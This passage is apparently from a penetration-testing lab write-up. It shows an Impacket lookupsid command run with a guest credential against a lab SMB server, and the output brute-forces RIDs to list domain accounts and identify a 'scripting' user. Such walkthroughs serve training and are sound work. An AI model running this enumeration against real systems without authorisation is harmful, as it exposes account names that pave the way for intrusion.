RID Cycling
The target SMB server allows guest session with read access to the IPC$ share.
This would mean that RID Cycling attack can be employed to bruteforce user’s RIDs.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/compromised]
└─$ impacket-lookupsid blah@$IP 1000000
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 192.168.225.152
[*] StringBinding ncacn_np:192.168.225.152[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-537427935-490066102-1511301751
500: COMPROMISED\Administrator (SidTypeUser)
501: COMPROMISED\Guest (SidTypeUser)
503: COMPROMISED\DefaultAccount (SidTypeUser)
504: COMPROMISED\WDAGUtilityAccount (SidTypeUser)
513: COMPROMISED\None (SidTypeGroup)
1000: COMPROMISED\scripting (SidTypeUser)Performing the rid cycling attack with an arbitrary credential against the target SMB service; blahblah
scripting account has been identified.